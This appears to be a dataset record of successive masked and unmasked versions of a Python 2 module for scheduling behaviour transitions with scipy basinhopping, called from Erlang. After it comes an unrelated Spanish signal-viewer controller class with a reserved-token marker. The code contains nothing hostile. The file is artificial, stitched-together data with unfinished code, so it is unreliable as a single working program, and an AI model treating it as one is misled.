"step-2": "<mask token>\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n \"\"\"Erlang Entry Point to Optimization Module\"\"\"\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\n<mask token>\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) of same shape\"\"\"\n return np.array(F)\n\n\n<mask token>\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\n<mask token>\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-3": "<mask token>\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n \"\"\"Erlang Entry Point to Optimization Module\"\"\"\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\ndef parse_edgelist(edges):\n \"\"\"[((a, b), tau)] -> {(a, b): tau}\"\"\"\n return {(a, b): tau for (a, b), tau in edges}\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) of same shape\"\"\"\n return np.array(F)\n\n\ndef initial_soln(path, t_max):\n \"\"\"Evenly Distributed, no check for taus\"\"\"\n j = t_max / len(path)\n return np.array([((i + 1) * j) for i in xrange(len(path) - 1)])\n\n\ndef transition_costs(path, btg):\n \"\"\"Sequence of transition costs associated with the prescribed path\"\"\"\n return [btg[path[i], path[i + 1]] for i in xrange(len(path) - 1)]\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\ndef flow_served(cum_F, times, costs, queue_model=None, dt=1.0):\n \"\"\"Times: [t1, ..., td],\n costs: [t_{b0, b1}, t_{b1, b2}, ...]\n Returns the Fulfillment matrix associated with each behaviour segment.\"\"\"\n discr_index = lambda x: int(x / dt) - 1\n t_steps = [0] + map(discr_index, times)\n t_steps.append(cum_F.shape[-1] - 1)\n c_steps = [0] + map(discr_index, costs)\n result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i +\n 1]) for i in xrange(len(costs) + 1)])\n return result\n\n\ndef obj(times, B, cum_F, costs, dt=1.0):\n \"\"\"Objective Function for Hillclimbing\"\"\"\n Z = B * flow_served(cum_F, times, costs, dt=dt)\n return Z.sum()\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-4": "from erlport.erlterms import Atom\nfrom scipy.optimize import basinhopping\nimport numpy as np\nimport qsim\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n \"\"\"Erlang Entry Point to Optimization Module\"\"\"\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\ndef parse_edgelist(edges):\n \"\"\"[((a, b), tau)] -> {(a, b): tau}\"\"\"\n return {(a, b): tau for (a, b), tau in edges}\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) of same shape\"\"\"\n return np.array(F)\n\n\ndef initial_soln(path, t_max):\n \"\"\"Evenly Distributed, no check for taus\"\"\"\n j = t_max / len(path)\n return np.array([((i + 1) * j) for i in xrange(len(path) - 1)])\n\n\ndef transition_costs(path, btg):\n \"\"\"Sequence of transition costs associated with the prescribed path\"\"\"\n return [btg[path[i], path[i + 1]] for i in xrange(len(path) - 1)]\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\ndef flow_served(cum_F, times, costs, queue_model=None, dt=1.0):\n \"\"\"Times: [t1, ..., td],\n costs: [t_{b0, b1}, t_{b1, b2}, ...]\n Returns the Fulfillment matrix associated with each behaviour segment.\"\"\"\n discr_index = lambda x: int(x / dt) - 1\n t_steps = [0] + map(discr_index, times)\n t_steps.append(cum_F.shape[-1] - 1)\n c_steps = [0] + map(discr_index, costs)\n result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i +\n 1]) for i in xrange(len(costs) + 1)])\n return result\n\n\ndef obj(times, B, cum_F, costs, dt=1.0):\n \"\"\"Objective Function for Hillclimbing\"\"\"\n Z = B * flow_served(cum_F, times, costs, dt=dt)\n return Z.sum()\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-5": "from erlport.erlterms import Atom\nfrom scipy.optimize import basinhopping\nimport numpy as np\nimport qsim\n\nclass Bounds(object):\n '''Required for acceptance testing in scipy.optimize.basinhopping'''\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [x[i] + c <= x[i+1] for i, c in enumerate(self.costs[1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs[\"x_new\"]\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n '''Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i'''\n funs = [lambda x: x[i + 1] - x[i] + c\n for i, c in enumerate(self.costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [lambda x: x[i] for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n\n # im matrix form\n n = len(self.costs)\n # -x_i <= 0\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n # tmax constraints\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n # cost constraints\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n-1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {\"slsqp\": {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)},\n \"cobyla\": [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n '''Return bounds as sequence'''\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\n\nclass Stepper(object):\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n '''Erlang Entry Point to Optimization Module'''\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.,\n maxiter=20, Acc0=None, method=\"SLSQP\"):\n '''\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n '''\n # Given a particular path, find the optimal times to transition\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table,\n BTG, t_max, F, dt=dt, Acc0=Acc0)\n\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds(),\n 'constraints': bounds.SLSQP_constraints()[method.lower()],\n }\n result = basinhopping(L, x0.copy(),\n accept_test=bounds,\n take_step=step_taker, stepsize=10*dt,\n niter=maxiter, T=initial_T,\n interval=20,\n minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)),\n key=lambda x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0,\n q_acc_model=qsim.integrator, q_acc_model_args=[], q_model_kwargs={},\n q_relief_model=qsim.linear_relief,\n deadtime_penalty=4):\n '''Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n '''\n B = np.vstack(BTable[bid] for bid in path) # Behaviour Matrix (d,4)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0., (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n '''Simulate the queue effects, and then evaluate the objective function\n on the simulation result'''\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=BTable,\n Acc0=Acc0, relief_mode_kwargs={\"rate\": 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n\n return (-obj(x, B, cum_Z, taus, dt=dt)\n + 0.25* avg_rates.dot(Deadtimes) ** 2\n - avg_rates.sum()*Acc.sum()) # ????\n\n\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\n# Parsers ###############################################################\ndef parse_edgelist(edges):\n '''[((a, b), tau)] -> {(a, b): tau}'''\n return {(a, b): tau for (a, b), tau in edges}\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n '''[(bid, [bvec])] -> {bid: <bvec>}'''\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\ndef parse_prediction(F):\n '''[[float]] -> np.array(...) of same shape'''\n return np.array(F) # Might not work, will check back later\n\n\n# Optimization ###############################################################\ndef initial_soln(path, t_max):\n '''Evenly Distributed, no check for taus'''\n j = t_max / len(path)\n return np.array([(i + 1) * j for i in xrange(len(path) - 1)])\n\ndef transition_costs(path, btg):\n '''Sequence of transition costs associated with the prescribed path'''\n return [btg[(path[i], path[i+1])] for i in xrange(len(path) - 1)]\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n '''Penalty brutally dominates any out-of-index operation...'''\n z = cum_F.shape[-1] - 1\n if (not 0 <= a <= z) or (not 0 <= b <= z):\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\ndef flow_served(cum_F, times, costs, queue_model=None, dt=1.):\n '''Times: [t1, ..., td],\n costs: [t_{b0, b1}, t_{b1, b2}, ...]\n Returns the Fulfillment matrix associated with each behaviour segment.'''\n discr_index = lambda x: int(x / dt) - 1\n t_steps = [0] + map(discr_index, times)\n t_steps.append(cum_F.shape[-1] - 1) # t_max\n\n c_steps = [0] + map(discr_index, costs)\n\n result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i + 1])\n for i in xrange(len(costs) + 1)])\n return result\n\ndef obj(times, B, cum_F, costs, dt=1.):\n '''Objective Function for Hillclimbing'''\n Z = B * flow_served(cum_F, times, costs, dt=dt)\n return Z.sum()\n\ndef barrier(times, path, BTG):\n '''Handles Linear/causality Constraints with respect to transitions'''\n t = [0] + list(times)\n S = 0.\n for i in xrange(len(path) - 1):\n edge = (path[i], path[i + 1])\n tau = BTG[edge]\n S += min(0, (t[i + 1] - t[i] - tau)) # Only accrue if constraint is voilated\n return S\n",
"step-ids": [
16,
17,
22,
23,
24
]
}
|
[
16,
17,
22,
23,
24
] |
<|reserved_special_token_0|>
class Controlador(object):
def __init__(self, vista, modelo, vista2):
self._mi_vista = vista
self._mi_modelo = modelo
self._mi2_ventana = vista2
def recibirruta(self, r):
self._mi_modelo.recibirruta(r)
def recibirtipodearchivo(self, tipefile):
self._mi_modelo.recibirtipodearchivo(tipefile)
def loadsignals(self, l):
mini, maxi = self._mi_modelo.loadsignals(l)
return mini, maxi
def graph(self, ch, m, mx):
senal = self._mi_modelo.graph(ch, m, mx)
return senal
